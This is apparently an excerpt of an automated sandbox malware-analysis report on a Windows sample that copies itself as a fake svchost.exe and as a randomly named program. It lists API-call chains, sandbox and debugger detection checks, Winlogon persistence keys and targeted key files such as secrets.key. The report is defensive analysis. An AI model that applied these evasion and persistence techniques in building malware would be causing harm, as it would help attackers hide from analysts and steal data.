Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	4_2_012F5230
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	4_2_012E7D50
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	4_2_01302750
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	4_2_01300F40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	4_2_012ED7A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,	4_2_012E37E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	4_2_013027C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	4_2_012E1660
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	5_2_00E467D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetUserNameA,memset,StrStrIA,	5_2_00E4A8E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	5_2_00E521E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	5_2_00E51160
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	5_2_00E31170
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	5_2_00E4C900
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	5_2_00E53910
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	5_2_00E45230
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	5_2_00E53B90
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	5_2_00E37D50
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	5_2_00E31660
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,	5_2_00E337E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	5_2_00E527C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	5_2_00E3D7A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	5_2_00E50F40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	5_2_00E52750
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,	8_2_00E867D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetUserNameA,memset,StrStrIA,	8_2_00E8A8E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,	8_2_00E921E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,	8_2_00E91160
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,	8_2_00E71170
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,	8_2_00E8C900
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,	8_2_00E93910
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,	8_2_00E85230
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,	8_2_00E93B90
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,	8_2_00E77D50
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,	8_2_00E71660
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,InitializeCriticalSection,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,	8_2_00E737E0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,	8_2_00E927C0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,	8_2_00E7D7A0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,	8_2_00E90F40
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: memset,GetModuleFileNameA,StrStrIA,	8_2_00E92750

Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)

Source: C:\Users\user\Desktop\roundwood.exe	Code function: 0_2_00403870 RegQueryValueEx -> SystemBiosVersion/Date		0_2_00403870
Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_00403870 RegQueryValueEx -> SystemBiosVersion/Date		2_2_00403870

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Windows\apppatch\svchost.exe	Evasive API call chain: CreateMutex,DecisionNodes,Sleep			graph_2-82754

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Users\user\Desktop\roundwood.exe

Evasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcess

graph_0-30303

Found evasive API chain checking for user administrative privileges

Source: C:\Windows\apppatch\svchost.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_2-82701
Source: C:\Users\user\Desktop\roundwood.exe	Check user administrative privileges: IsUserAndAdmin, DecisionNode			graph_0-30336

Found stalling execution ending in API Sleep call

Source: C:\Windows\apppatch\svchost.exe

Stalling execution: Execution stalls by calling Sleep

graph_2-82343

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 0000000F.00000002.2451052390.0000000000960000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: IDAG.EXE
Source: svchost.exe, 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLSYSTEMDRIVESOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON%XSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNUSERINIT\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\DRIVERS\NTFS.SYSNTDLL.DLLRTLUNIFORMKERNEL32.DLLISWOW64PROCESSKERNEL.DLLA
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: NAME.KEY\SECRETS.KEYSIGN.KEYJAVA.EXEKERNEL32.DLLCREATEFILEW\EXPLORER.EXEGETFILEATTRIBUTESWUSER32.DLLGETWINDOWTEXTAOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
Source: oOzTQCDSVNrWDmuGqzFbKRbZs.exe, 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: VNAME.KEY\SECRETS.KEYSIGN.KEYJAVA.EXEKERNEL32.DLLCREATEFILEW\EXPLORER.EXEGETFILEATTRIBUTESWUSER32.DLLGETWINDOWTEXTAOLLYDBGWIRESHARK.EXEDUMPCAP.EXEIDAG.EXEVMWARETRAY.EXE\\?\GLOBALROOT\SYSTEMROOT\SYSTEM32\VMX_FB.DLLABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/
